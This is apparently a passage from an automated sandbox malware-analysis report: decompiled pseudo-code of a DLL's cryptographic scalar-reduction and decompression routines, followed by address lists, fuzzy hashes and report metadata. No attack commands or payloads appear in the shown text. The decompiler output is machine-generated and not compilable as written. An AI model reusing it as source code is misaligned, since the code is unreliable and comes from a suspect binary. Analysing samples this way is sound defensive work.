				signed long long _t743;
				signed char* _t746;
				signed long long _t748;
				signed long long _t752;
				void* _t754;
				signed long long _t755;
				signed long long _t757;
				signed long long _t761;
				signed long long _t769;
				signed long long _t775;
				signed long long _t782;
				signed long long _t783;
				signed long long _t785;
				signed long long _t789;
				void* _t798;
				signed long long* _t799;
				signed long long _t805;
				signed long long _t807;
				signed long long _t810;
				signed long long _t814;
				signed long long _t817;
				signed long long _t821;
				signed long long _t824;
				signed long long _t836;
				signed long long _t840;
				signed long long _t843;
				signed long long _t850;
				signed long long _t851;
				signed long long _t852;
				signed long long _t854;
				signed long long _t871;
				signed long long _t874;
				signed long long _t891;
				signed long long _t893;
				signed long long _t894;
				signed long long _t905;
				signed long long _t906;
				signed long long _t917;
				signed long long _t921;
				signed long long _t924;
				signed long long _t926;
				signed long long _t932;
				signed long long _t941;
				void* _t943;
				signed long long _t944;
				signed int _t945;
				signed long long _t951;
				void* _t958;
				signed long long _t960;
				signed long long _t970;
				signed long long _t981;
				signed long long _t985;
				signed long long _t989;

				 *((long long*)(_t798 + 8)) = __rcx;
				_push(_t769);
				_push(_t748);
				_push(_t726);
				_push(_t917);
				_push(_t932);
				_push(_t951);
				_push(_t970);
				_t799 = _t798 - 0x68;
				r9d =  *(__rcx + 0x34) & 0x000000ff;
				r9d = r9d & 0x0000000f;
				r8d =  *(__rcx + 0x39) & 0x000000ff;
				r8d = r8d & 0x0000003f;
				r13d =  *(__rcx + 0x27) & 0x000000ff;
				r12d =  *(__rcx + 0x2c) & 0x000000ff;
				r13d = r13d & 0x00000007;
				_t334 = __rax >> 2;
				_t752 = (_t748 << 0x00000008 | __rax) << 0x00000006 | _t334;
				_t335 = _t334 >> 7;
				_t836 = ((__r9 << 0x00000008 | _t334) << 0x00000008 | _t334) + ((__r9 << 0x00000008 | _t334) << 0x00000008 | _t334) | _t335;
				_t336 = _t335 >> 4;
				_t775 = ((_t769 << 0x00000008 | _t335) << 0x00000008 | _t335) << 0x00000004 | _t336;
				_t337 = _t336 >> 1;
				_t805 = (__r8 << 0x00000008 | _t336) << 0x00000007 | _t337;
				_t338 = _t337 >> 6;
				_t732 = ((_t726 << 0x00000008 | _t337) << 0x00000008 | _t337) << 0x00000002 | _t338;
				_t339 = _t338 >> 3;
				_t698 = ((__rdx << 0x00000008 | _t338) << 0x00000008 | _t338) << 0x00000005 | _t339;
				r12d = r12d & 0x001fffff;
				_t341 = _t698 * 0xa6f7d;
				_t921 = (_t917 << 0x00000010 | _t339 | _t339 << 0x00000008) - _t341;
				_t799[4] = _t921;
				r15d =  *(__rcx + 0x22) & 0x000000ff;
				r15d = r15d & 0x00000001;
				r14d =  *(__rcx + 0x12) & 0x000000ff;
				r11d =  *(__rcx + 0x17) & 0x000000ff;
				r14d = r14d & 0x00000007;
				_t345 = _t732 * 0x215d1;
				_t941 = (((_t932 << 0x00000008 | _t341) << 0x00000008 | _t341) << 0x00000002 | _t341 >> 0x00000006) - _t805 * 0xa6f7d - _t698 * 0xf39ad + _t345;
				_t799[3] = _t941;
				_t351 = _t775 * 0x215d1;
				_t981 = (((_t970 << 0x00000008 | _t345) << 0x00000008 | _t345) << 0x00000004 | _t345 >> 0x00000004) + _t732 * 0x9fb67 - _t836 * 0xa6f7d - _t805 * 0xf39ad + _t698 * 0x72d18 + _t351;
				 *_t799 = _t981;
				_t353 = _t752 * 0xa2c13;
				_t958 = (((_t951 << 0x00000008 | _t351) << 0x00000008 | _t351) << 0x00000002 | _t351 >> 0x00000006) + _t353;
				r11d = r11d & 0x001fffff;
				_t357 = _t775 * 0xa2c13;
				_t891 = (__r11 << 0x00000010 | _t353 | _t353 << 0x00000008) + _t752 * 0x9fb67 + _t836 * 0x72d18 + _t357;
				_t799[0x18] = _t891;
				_t548 = _t958 + 0x100000 >> 0x15;
				_t893 = _t891 + 0x100000 >> 0x15;
				_t363 = _t752 * 0x215d1;
				_t574 = ((__rcx << 0x00000008 | _t357) << 0x00000006 | _t357 >> 0x00000002) + _t775 * 0x9fb67 - _t836 * 0xf39ad + _t805 * 0x72d18 + _t732 * 0xa2c13 + _t363;
				_t799[0x17] = _t574;
				_t578 = (_t574 << 0x00000008 | _t363) << 0x00000005 | _t363 >> 0x00000003;
				_t367 = _t752 * 0x72d18 + _t548 + _t578;
				_t799[0x19] = _t836 * 0xa2c13 + _t367;
				_t586 = (((_t578 << 0x00000008 | _t367) << 0x00000008 | _t367) << 0x00000003 | _t367 >> 0x00000005) + _t836 * 0x9fb67 - _t752 * 0xf39ad;
				_t799[1] = _t805 * 0xa2c13 + _t775 * 0x72d18 + _t893 + _t586;
				_t871 = _t799[0x17] + 0x100000 >> 0x15;
				_t596 = (((_t586 << 0x00000008 | _t799[0x16]) << 0x00000008 | _t799[0x16]) + ((_t586 << 0x00000008 | _t799[0x16]) << 0x00000008 | _t799[0x16]) | _t799[0x16] >> 0x00000007) + _t805 * 0x9fb67 - _t752 * 0xa6f7d - _t775 * 0xf39ad + _t732 * 0x72d18;
				_t384 = _t698 * 0xa2c13 + _t871 + _t596;
				_t799[2] = _t836 * 0x215d1 + _t384;
				_t840 = _t981 + 0x100000 >> 0x15;
				_t807 = _t941 + 0x100000 >> 0x15;
				_t700 = _t921 + 0x100000 >> 0x15;
				_t924 = _t799[2] + 0x100000 >> 0x15;
				_t603 = ((_t596 << 0x00000008 | _t384) << 0x00000007 | _t384 >> 0x00000001) + _t698 * 0x9fb67 - _t775 * 0xa6f7d - _t732 * 0xf39ad;
				_t389 = _t840 + _t603;
				_t754 = _t805 * 0x215d1 + _t389;
				_t735 = _t799[0x19] + 0x100000 >> 0x15;
				_t392 = _t807 + ((_t603 << 0x00000008 | _t389) << 0x00000005 | _t389 >> 0x00000003) - _t732 * 0xa6f7d;
				_t943 = _t698 * 0x215d1 + _t392;
				_t610 = _t754 + 0x100000 >> 0x15;
				_t985 = _t799[1] + 0x100000 >> 0x15;
				_t782 = (((_t775 << 0x00000008 | _t392) << 0x00000008 | _t392) << 0x00000003 | _t392 >> 0x00000005) + _t700;
				 *_t799 =  *_t799 + _t924 - (_t840 << 0x15);
				_t810 = _t799[3] + _t610 - (_t807 << 0x15);
				_t755 = _t754 - (_t610 << 0x15);
				_t799[0xa] = _t782;
				_t799[3] = _t810;
				_t613 = _t943 + 0x100000 >> 0x15;
				_t799[9] = _t755;
				_t843 = _t799[4] + _t613 - (_t700 << 0x15);
				_t894 = _t893 << 0x15;
				_t944 = _t943 - (_t613 << 0x15);
				_t799[4] = _t843;
				_t799[0x17] = _t799[0x17] + _t782 * 0xfff59083 - (_t871 << 0x15) + _t985;
				_t704 = _t944 * 0xfff59083 - _t894 - _t782 * 0xf39ad;
				_t799[0x18] = _t799[0x18] + _t843 * 0x215d1 + _t735 + _t704;
				_t550 =  *_t799;
				_t783 = _t799[0x16];
				_t621 = _t843 * 0x9fb67 - (_t548 << 0x15) - _t755 * 0xa6f7d - _t944 * 0xf39ad + _t782 * 0x72d18;
				r9d =  *(_t783 + 7) & 0x000000ff;
				_t322 =  *(_t783 + 2) & 0x000000ff;
				r11d =  *(_t783 + 0xd) & 0x000000ff;
				_t410 = _t810 * 0x215d1 + _t958 + _t621;
				r11d = r11d & 0x00000001;
				_t799[5] = _t410;
				r9d = r9d & 0x0000007f;
				r8d = _t322;
				r8d = r8d & 0x001fffff;
				_t412 = _t550 * 0xa2c13;
				_t814 = (_t810 << 0x00000010 | _t410 | _t410 << 0x00000008) + _t412;
				 *_t799 = _t814;
				_t416 = _t799[3] * 0xa2c13;
				_t850 = ((_t843 << 0x00000008 | _t412) << 0x00000006 | _t412 >> 0x00000002) + _t550 * 0x9fb67 + _t755 * 0x72d18 + _t416;
				_t799[7] = _t850;
				_t422 = _t550 * 0x215d1;
				_t960 = _t814 + 0x100000 >> 0x15;
				_t817 = _t799[5] + 0x100000 >> 0x15;
				_t905 = (((_t894 << 0x00000008 | _t416) << 0x00000008 | _t416) << 0x00000004 | _t416 >> 0x00000004) + _t799[3] * 0x9fb67 - _t755 * 0xf39ad + _t944 * 0x72d18 + _t799[4] * 0xa2c13 + _t422;
				_t799[8] = _t905;
				_t851 = _t799[0x16];
				_t785 = _t850 + 0x100000 >> 0x15;
				_t627 = ((_t621 << 0x00000008 | _t422) << 0x00000008 | _t422) << 0x00000003 | _t704 >> 0x00000005;
				_t425 = _t550 * 0x72d18 + _t960 + _t627;
				_t874 = _t755 * 0xa2c13 + _t425;
				_t799[6] = _t874;
				_t906 = _t799[4];
				_t757 = _t905 + 0x100000 >> 0x15;
				_t635 = (((_t627 << 0x00000008 | _t425) << 0x00000008 | _t425) + ((_t627 << 0x00000008 | _t425) << 0x00000008 | _t425) | _t425 >> 0x00000007) + _t755 * 0x9fb67 - _t550 * 0xf39ad;
				_t431 = _t799[3] * 0x72d18 + _t785 + _t635;
				_t320 =  *(_t851 + 0xf) & 0x3f;
				_t799[0xb] = _t944 * 0xa2c13 + _t431;
				_t852 = _t799[0xa];
				_t799[9] = _t799[9] * 0x215d1 + _t852 * 0xa2c13 + _t757 + ((_t635 << 0x00000008 | _t431) << 0x00000007 | _t431 >> 0x00000001) + _t944 * 0x9fb67 - _t550 * 0xa6f7d - _t799[3] * 0xf39ad + _t906 * 0x72d18;
				_t945 = _t799[9];
				_t799[0x19] = _t799[0x19] + _t944 * 0x215d1 + _t817 + _t852 * 0x9fb67 - (_t735 << 0x15) - _t799[3] * 0xa6f7d - _t906 * 0xf39ad;
				_t716 = _t799[0x18] + 0x100000 >> 0x15;
				_t908 = _t945 + 0x100000 >> 0x15;
				_t854 = _t874 + 0x100000 >> 0x15;
				_t552 = _t799[1] + _t852 * 0x215d1 + _t906 * 0xfff59083 - (_t985 << 0x15) + _t716;
				_t799[1] = _t552;
				_t650 = _t799[0x17] + 0x100000 >> 0x15;
				_t554 = _t552 + 0x100000 >> 0x15;
				_t926 = _t799[0xb];
				_t738 = _t799[2] + _t650 - (_t924 << 0x15);
				_t799[2] = _t738;
				_t740 = _t738 + 0x100000 >> 0x15;
				_t876 = _t926 + 0x100000 >> 0x15;
				_t821 = _t799[0x19] + 0x100000 >> 0x15;
				_t799[0x18] = _t799[0x18] + _t821 - (_t716 << 0x15);
				_t799[0x17] = _t799[0x17] + _t554 - (_t650 << 0x15);
				_t653 =  *_t799 + _t740 * 0xa2c13 - (_t960 << 0x15);
				 *_t799 = _t653;
				_t654 = _t653 >> 0x15;
				_t719 = _t799[6] + _t740 * 0x72d18 - (_t854 << 0x15) + _t654;
				_t799[6] = _t719;
				_t789 = _t799[7] + _t740 * 0x9fb67 - (_t785 << 0x15) + _t854 + (_t719 >> 0x15);
				_t799[7] = _t789;
				_t761 = _t799[8] + _t740 * 0x215d1 - (_t757 << 0x15) + (_t926 + 0x100000 >> 0x15) + (_t926 + _t740 * 0xfff0c653 - (_t876 << 0x15) + (_t789 >> 0x15) >> 0x15);
				_t799[8] = _t761;
				_t989 = _t799[5] + (_t945 + 0x100000 >> 0x15) - (_t817 << 0x15) + (_t945 + _t740 * 0xfff59083 - (_t908 << 0x15) + (_t761 >> 0x15) >> 0x15);
				_t799[5] = _t989;
				_t824 = _t799[0x19] + (_t989 >> 0x15) - (_t821 << 0x15);
				_t799[0x19] = _t824;
				_t474 = _t799[0x18] + (_t824 >> 0x15);
				_t799[0x18] = _t474;
				_t557 = _t799[1] + (_t474 >> 0x15) - (_t554 << 0x15);
				_t799[1] = _t557;
				_t478 = _t799[0x17] + (_t557 >> 0x15);
				_t799[0x17] = _t478;
				_t743 = _t799[2] + (_t478 >> 0x15) - (_t740 << 0x15);
				_t799[2] = _t743;
				_t657 =  *_t799 + (_t743 >> 0x15) * 0xa2c13 - (_t654 << 0x15);
				 *_t799 = _t657;
				 *_t799 =  *_t799 - (_t657 >> 0x15 << 0x15);
				_t746 = _t799[0x16];
				_t746[1] =  *(_t851 + 0xd) & 0x000000ff;
				 *_t746 = _t320;
				_t280 = (_t322 & 0x000000ff) << 0x00000005 | _t320;
				_t746[0x15] = bpl;
				_t746[2] = _t280;
				_t746[3] = _t280;
				_t746[4] = _t280;
				_t282 = (r9b & 0xffffffff) << 2;
				_t746[6] = _t282;
				_t285 = (r12b & 0xffffffff) << 0x00000007 | r9b;
				_t746[5] = _t322 | _t282;
				_t746[7] = _t285;
				_t746[8] = _t285;
				_t746[9] = _t285;
				_t287 = (r10b & 0xffffffff) << 4;
				r12b = r12b | _t287;
				_t746[0xb] = _t287;
				_t746[0xc] = _t287;
				_t289 = (r13b & 0xffffffff) + (r13b & 0xffffffff);
				r10b = r10b | _t289;
				_t746[0xa] = r12b;
				_t746[0xd] = r10b;
				_t746[0xe] = _t289;
				_t292 = (r11b & 0xffffffff) << 0x00000006 | r13b;
				_t746[0xf] = _t292;
				_t746[0x10] = _t292;
				_t746[0x11] = _t292;
				_t294 = (sil & 0xffffffff) << 3;
				r11b = r11b | _t294;
				_t746[0x13] = _t294;
				_t746[0x12] = r11b;
				_t746[0x14] = sil;
				_t746[0x16] = _t294;
				_t297 = (__ebx & 0x000000ff) << 0x00000005 | bpl;
				_t746[0x17] = _t297;
				_t746[0x18] = _t297;
				_t746[0x19] = _t297;
				_t299 = (r14b & 0xffffffff) << 2;
				_t746[0x1b] = _t299;
				_t302 = (r8b & 0xffffffff) << 0x00000007 | r14b;
				_t746[0x1a] = __ebx | _t299;
				_t746[0x1c] = _t302;
				_t746[0x1d] = _t302;
				_t746[0x1f] = r8b;
				_t746[0x1e] = _t302;
				return _t302;
			}

0x7fef30e9600
0x7fef30e9606
0x7fef30e9607
0x7fef30e9608
0x7fef30e9609
0x7fef30e960b
0x7fef30e960d
0x7fef30e960f
0x7fef30e9611
0x7fef30e9623
0x7fef30e962c
0x7fef30e9630
0x7fef30e963c
0x7fef30e9647
0x7fef30e964c
0x7fef30e9651
0x7fef30e9674
0x7fef30e9680
0x7fef30e9699
0x7fef30e96a0
0x7fef30e96b9
0x7fef30e96c1
0x7fef30e96cf
0x7fef30e96d6
0x7fef30e96ef
0x7fef30e96f7
0x7fef30e9710
0x7fef30e9718
0x7fef30e972a
0x7fef30e9734
0x7fef30e973b
0x7fef30e9742
0x7fef30e974b
0x7fef30e9757
0x7fef30e975b
0x7fef30e9760
0x7fef30e9765
0x7fef30e979f
0x7fef30e97a6
0x7fef30e97b0
0x7fef30e97f7
0x7fef30e97fe
0x7fef30e9808
0x7fef30e9826
0x7fef30e982d
0x7fef30e983f
0x7fef30e9868
0x7fef30e986f
0x7fef30e987a
0x7fef30e98be
0x7fef30e98cc
0x7fef30e98d0
0x7fef30e98d7
0x7fef30e98df
0x7fef30e9900
0x7fef30e9914
0x7fef30e991a
0x7fef30e9979
0x7fef30e9994
0x7fef30e99ba
0x7fef30e9a0c
0x7fef30e9a19
0x7fef30e9a1f
0x7fef30e9a2b
0x7fef30e9a59
0x7fef30e9aa0
0x7fef30e9aa7
0x7fef30e9ab6
0x7fef30e9ab9
0x7fef30e9ac2
0x7fef30e9afe
0x7fef30e9b02
0x7fef30e9b0a
0x7fef30e9b1c
0x7fef30e9b48
0x7fef30e9b4c
0x7fef30e9b59
0x7fef30e9b71
0x7fef30e9b74
0x7fef30e9b77
0x7fef30e9b83
0x7fef30e9b88
0x7fef30e9b8f
0x7fef30e9b97
0x7fef30e9b9a
0x7fef30e9ba2
0x7fef30e9ba5
0x7fef30e9bcd
0x7fef30e9bdf
0x7fef30e9be9
0x7fef30e9c02
0x7fef30e9c1a
0x7fef30e9c22
0x7fef30e9c2c
0x7fef30e9c31
0x7fef30e9c38
0x7fef30e9c3d
0x7fef30e9c44
0x7fef30e9c48
0x7fef30e9c4d
0x7fef30e9c55
0x7fef30e9c6f
0x7fef30e9c79
0x7fef30e9c80
0x7fef30e9c8a
0x7fef30e9caf
0x7fef30e9cb8
0x7fef30e9cc2
0x7fef30e9d2b
0x7fef30e9d32
0x7fef30e9d41
0x7fef30e9d45
0x7fef30e9d4f
0x7fef30e9d5f
0x7fef30e9d6e
0x7fef30e9d76
0x7fef30e9d8a
0x7fef30e9d92
0x7fef30e9da4
0x7fef30e9dd2
0x7fef30e9dda
0x7fef30e9de5
0x7fef30e9df4
0x7fef30e9dff
0x7fef30e9e0e
0x7fef30e9e21
0x7fef30e9e73
0x7fef30e9e9d
0x7fef30e9ec4
0x7fef30e9eec
0x7fef30e9ef7
0x7fef30e9efb
0x7fef30e9f15
0x7fef30e9f27
0x7fef30e9f2c
0x7fef30e9f3a
0x7fef30e9f45
0x7fef30e9f4a
0x7fef30e9f4d
0x7fef30e9f6a
0x7fef30e9f7d
0x7fef30e9f81
0x7fef30e9f90
0x7fef30e9fa2
0x7fef30e9fb4
0x7fef30e9fbe
0x7fef30e9fc5
0x7fef30e9ffa
0x7fef30e9ffd
0x7fef30ea00d
0x7fef30ea045
0x7fef30ea04e
0x7fef30ea055
0x7fef30ea06f
0x7fef30ea075
0x7fef30ea08c
0x7fef30ea097
0x7fef30ea0a3
0x7fef30ea0a9
0x7fef30ea0c0
0x7fef30ea0cb
0x7fef30ea0d4
0x7fef30ea0da
0x7fef30ea0f1
0x7fef30ea0f4
0x7fef30ea10b
0x7fef30ea10e
0x7fef30ea12c
0x7fef30ea283
0x7fef30ea29d
0x7fef30ea2a6
0x7fef30ea2ac
0x7fef30ea2ae
0x7fef30ea2b2
0x7fef30ea2bc
0x7fef30ea2c6
0x7fef30ea2cd
0x7fef30ea2dd
0x7fef30ea2eb
0x7fef30ea2ee
0x7fef30ea2f1
0x7fef30ea2fa
0x7fef30ea304
0x7fef30ea30b
0x7fef30ea312
0x7fef30ea31c
0x7fef30ea326
0x7fef30ea32d
0x7fef30ea333
0x7fef30ea336
0x7fef30ea33d
0x7fef30ea345
0x7fef30ea353
0x7fef30ea356
0x7fef30ea360
0x7fef30ea36a
0x7fef30ea371
0x7fef30ea378
0x7fef30ea382
0x7fef30ea390
0x7fef30ea394
0x7fef30ea398
0x7fef30ea3a5
0x7fef30ea3a8
0x7fef30ea3b2
0x7fef30ea3bc
0x7fef30ea3c3
0x7fef30ea3d3
0x7fef30ea3e1
0x7fef30ea3e4
0x7fef30ea3e7
0x7fef30ea3f0
0x7fef30ea3fe
0x7fef30ea402
0x7fef30ea415

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 993e25a025fb91e37ff8ef4adef35a3fee025afcc733df56e6b3651567b5920d
Instruction ID: e6167623ac478f46a03c0310a669e514dd19d40aa4fb5d3c5152353c698ce47c
Opcode Fuzzy Hash: 993e25a025fb91e37ff8ef4adef35a3fee025afcc733df56e6b3651567b5920d
Instruction Fuzzy Hash: 4B6248537157E84ACE558BADB8273A96EA4E3853C5F486036EBDD03F96DA3CE211C310

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305FE13 Relevance: .8, Instructions: 766
COMMONCrypto

Download Yara Rule

C-Code - Quality: 40%

			E000007FE7FEF305FE13(signed int __rdi, signed int __rsi, void* __r8, void* __r10, void* __r11, void* __r12, long long __r13, void* __r14, void* __r15) {
				signed int _t423;
				signed char _t424;
				signed char _t425;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed char _t430;
				signed char _t437;
				signed int _t445;
				signed int _t448;
				signed int _t451;
				unsigned int _t456;
				signed int _t457;
				short _t459;
				signed int _t473;
				signed short _t475;
				signed int _t476;
				signed int _t478;
				signed int _t486;
				signed short _t488;
				signed char _t497;
				signed int _t503;
				signed int _t506;
				unsigned int _t510;
				signed int _t539;
				signed int _t542;
				signed char _t543;
				signed int _t552;
				unsigned int _t576;
				signed int _t577;
				short _t579;
				signed char _t594;
				signed char _t596;
				signed int _t600;
				signed int _t601;
				signed char _t603;
				signed char _t609;
				signed int _t613;
				signed char _t617;
				signed int _t620;
				signed char _t639;
				unsigned int _t646;
				signed char _t648;
				signed int _t658;
				signed int _t664;
				signed int _t677;
				signed int _t678;
				signed int _t684;
				signed short _t686;
				signed int _t688;
				signed short _t691;
				signed int _t696;
				signed int _t697;
				signed short _t700;
				void* _t704;
				signed int _t707;
				signed int _t710;
				signed int _t717;
				signed int _t720;
				signed int _t723;
				signed char _t725;
				signed int _t742;
				signed int _t744;
				signed int _t768;
				signed int _t771;
				signed short _t780;
				void* _t785;
				void* _t788;
				void* _t811;
				signed int _t821;
				void* _t823;
				void* _t852;
				short _t860;
				void* _t865;
				signed int _t893;
				signed int _t894;
				void* _t898;
				void* _t901;
				void* _t903;
				signed int _t911;
				void* _t915;
				signed long long _t918;
				signed long long _t922;
				signed long long _t923;
				signed long long _t929;
				signed long long _t930;
				long long _t946;
				signed int _t955;
				signed long long _t956;
				signed long long _t957;
				signed long long _t961;
				signed long long _t962;
				signed long long _t963;
				signed long long _t964;
				signed long long _t965;
				signed long long _t966;
				signed long long _t967;
				signed long long _t969;
				void* _t970;
				long long* _t977;
				void* _t979;
				long long _t980;
				signed long long _t982;
				signed long long _t986;
				signed long long _t987;
				signed long long _t996;
				signed long long _t1000;
				intOrPtr _t1008;
				void* _t1010;
				long long _t1013;
				signed long long _t1014;
				intOrPtr _t1015;
				signed long long _t1017;
				signed long long _t1021;
				unsigned long long _t1025;
				signed long long _t1029;
				unsigned long long _t1030;
				signed long long _t1038;
				unsigned long long _t1041;
				unsigned long long _t1042;
				intOrPtr _t1051;
				signed long long _t1056;
				unsigned long long _t1058;
				signed long long _t1065;
				signed long long _t1066;
				signed long long _t1070;
				signed long long _t1074;
				intOrPtr _t1076;
				void* _t1078;
				signed long long _t1087;
				long long _t1092;
				void* _t1093;
				signed long long _t1096;
				signed char* _t1101;
				signed long long _t1105;
				signed long long _t1106;
				signed long long _t1107;
				signed long long _t1109;
				void* _t1114;
				signed long long _t1125;
				void* _t1127;
				void* _t1130;
				void* _t1131;
				long long _t1132;
				void* _t1136;
				intOrPtr _t1139;
				void* _t1141;
				intOrPtr _t1148;
				intOrPtr _t1151;
				long long _t1153;
				signed char* _t1156;
				intOrPtr _t1159;
				intOrPtr _t1160;
				intOrPtr _t1161;
				intOrPtr _t1163;
				signed long long _t1164;
				long long _t1169;
				signed char* _t1172;
				long long _t1180;
				signed char* _t1183;
				void* _t1187;
				void* _t1191;
				void* _t1194;
				void* _t1195;
				void* _t1199;
				void* _t1200;
				signed int* _t1201;
				signed long long _t1207;

				_t1021 =  *((intOrPtr*)(_t1127 + 0x1a8));
				_t996 = __r15 - __r14;
				if (_t996 - 4 < 0) goto 0xf306060d;
				_t915 = _t1021 - __r8;
				if (_t915 - 2 < 0) goto 0xf306060d;
				if (_t915 - 0x103 < 0) goto 0xf305fe4d;
				if (_t996 - 0xd > 0) goto 0xf3060750;
				_t423 =  *(_t1127 + 0x38);
				if (_t915 - 0x1e >= 0) goto 0xf305fe76;
				_t1187 = __r14 + 4;
				 *(_t1127 + 0x30) = _t1021 << _t423 |  *(_t1127 + 0x30);
				_t424 = _t423 + 0x20;
				 *(_t1127 + 0x38) = _t424;
				goto 0xf305fe7b;
				_t684 =  *((short*)(__r10 + 0x3c + _t996 * 2));
				if (_t684 < 0) goto 0xf305fea3;
				if ((_t684 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305fecf;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !_t684 - 0x23f > 0) goto 0xf30611c7;
				_t686 =  *((short*)(__r10 + 0x83c + __rdi * 2));
				_t780 = _t686;
				if (_t780 < 0) goto 0xf305fea8;
				 *(_t1127 + 0x40) = _t686 & 0x0000ffff;
				_t1025 =  *(_t1127 + 0x30) >> 0xb;
				 *(_t1127 + 0x30) = _t1025;
				_t425 = _t424 - 0xb;
				 *(_t1127 + 0x38) = _t425;
				r12b = 0x15;
				asm("bt edi, 0x8");
				if (_t780 < 0) goto 0xf305f43b;
				_t710 =  *((short*)(__r10 + 0x3c + _t996 * 2));
				if (_t710 < 0) goto 0xf305ff16;
				if ((_t710 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305ff42;
				asm("dec eax");
				asm("adc esi, 0x0");
				if ( !_t710 - 0x23f > 0) goto 0xf3061207;
				if ( *((short*)(__r10 + 0x83c + __rsi * 2)) < 0) goto 0xf305ff1b;
				 *(_t1127 + 0x30) = _t1025 >> 0xb;
				 *(_t1127 + 0x38) = _t425 - 0xb;
				_t785 = __r8 -  *((intOrPtr*)(_t1127 + 0x1a8));
				if (_t785 >= 0) goto 0xf3061284;
				 *((intOrPtr*)(__r11 + __r8)) = dil;
				asm("bt esi, 0x8");
				if (_t785 < 0) goto 0xf3060a8e;
				if (__r8 + 1 -  *((intOrPtr*)(_t1127 + 0x1a8)) >= 0) goto 0xf30612a2;
				 *((intOrPtr*)(__r11 + __r8 + 1)) = sil;
				_t1130 = __r8 + 2;
				_t427 =  *(_t1127 + 0x40);
				r12b = 0x15;
				if (_t427 - 0xff > 0) goto 0xf305f43b;
				_t788 = _t1130 -  *((intOrPtr*)(_t1127 + 0x1a8));
				if (_t788 == 0) goto 0xf3061262;
				if (_t788 >= 0) goto 0xf3061284;
				 *(__r11 + _t1130) = _t427;
				_t1131 = _t1130 + 1;
				r12b = 0xc;
				_t428 =  *(_t1127 + 0x38);
				if (_t428 - 0xe > 0) goto 0xf30600a1;
				_t1000 = __r15 - _t1187;
				if (_t1000 - 1 > 0) goto 0xf3060085;
				_t576 =  *((short*)(__r10 + 0xddc + _t1000 * 2));
				if (_t576 < 0) goto 0xf3060019;
				if ((_t576 & 0x0000ffff) - 0x200 < 0) goto 0xf3060056;
				_t577 = _t576 >> 9;
				if (_t428 - _t577 < 0) goto 0xf3060056;
				goto 0xf30600a1;
				if (_t428 - 0xb < 0) goto 0xf3060056;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t577 - 0x23f > 0) goto 0xf30611b9;
				_t579 =  *((short*)(__r10 + 0x15dc + _t1000 * 2));
				if (_t579 >= 0) goto 0xf3060051;
				if (_t428 - 0xc >= 0) goto 0xf3060023;
				if (_t579 >= 0) goto 0xf30600a1;
				if (_t1187 == __r15) goto 0xf3060156;
				_t1106 = _t1105 << _t428;
				_t1029 =  *(_t1127 + 0x30) | _t1106;
				 *(_t1127 + 0x30) = _t1029;
				_t429 = _t428 + 8;
				 *(_t1127 + 0x38) = _t429;
				if (_t429 - 0xe <= 0) goto 0xf305ffed;
				goto 0xf30600a1;
				_t1107 = _t1106 << _t429;
				_t1030 = _t1029 | _t1107;
				 *(_t1127 + 0x30) = _t1030;
				_t430 = _t429 + 0x10;
				 *(_t1127 + 0x38) = _t430;
				_t688 =  *((short*)(__r10 + 0xddc + _t1000 * 2));
				if (_t688 < 0) goto 0xf30600c3;
				goto 0xf30600ef;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t688 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t691 =  *((short*)(__r10 + 0x15dc + __rdi * 2));
				if (_t691 < 0) goto 0xf30600c8;
				if (0xa == 0) goto 0xf30606cb;
				 *(_t1127 + 0x30) = _t1030 >> 0xb;
				 *(_t1127 + 0x38) = _t430 - 0xb;
				if ((_t691 & 0x0000ffff) - 0x1d > 0) goto 0xf306013e;
				 *(_t1127 + 0x44) =  *(__rdi + 0xf311ef48) & 0x000000ff;
				 *(_t1127 + 0x3c) =  *(0xf311ef68 + __rdi * 2) & 0x0000ffff;
				_t592 =  ==  ? 0x1601 : 0x1001;
				r12d = 0x2101;
				r12d = r12d & 0x00003700;
				_t807 =  ==  ? 0x1601 : 0x1001;
				if (( ==  ? 0x1601 : 0x1001) == 0) goto 0xf305ffd4;
				goto 0xf3060485;
				r12d =  *(_t1127 + 0x7c);
				goto 0xf3060149;
				_t594 =  *(_t1127 + 0x38);
				_t542 =  *(_t1127 + 0x50);
				if (_t594 - 8 >= 0) goto 0xf3060565;
				if (__r15 == __r15) goto 0xf306019f;
				 *(_t1127 + 0x30) =  *(_t1127 + 0x30) | _t1107 << _t594;
				 *(_t1127 + 0x38) = _t594 + 8;
				_t1191 = __r15 + 1;
				goto 0xf30601a4;
				if ((bpl & 0x00000002) == 0) goto 0xf3060172;
				_t918 =  *((intOrPtr*)(_t1127 + 0x1a8));
				_t811 = _t1131 - _t918;
				if (_t811 == 0) goto 0xf3061238;
				if (_t811 >= 0) goto 0xf3061284;
				 *((char*)(__r11 + _t1131)) =  *(_t1127 + 0x3c);
				_t1132 = _t1131 + 1;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				 *(_t1127 + 0x40) =  *(_t1127 + 0x40) - 1;
				r12d =  ==  ? 6 : r12d;
				 *((long long*)(_t1127 + 0x70)) = __r13;
				r13d =  *(_t1127 + 0x3c);
				_t1109 =  *((intOrPtr*)(_t1127 + 0x1a8));
				if (_t1132 == _t1109) goto 0xf3060b97;
				_t979 = _t1109 - _t1132;
				_t1092 = _t1132;
				_t980 =  >=  ? _t918 : _t979;
				 *((long long*)(_t1127 + 0x28)) =  *(_t1127 + 0xb8);
				 *((long long*)(_t1127 + 0x20)) = _t980;
				_t1153 = _t1092;
				E000007FE7FEF30616A0();
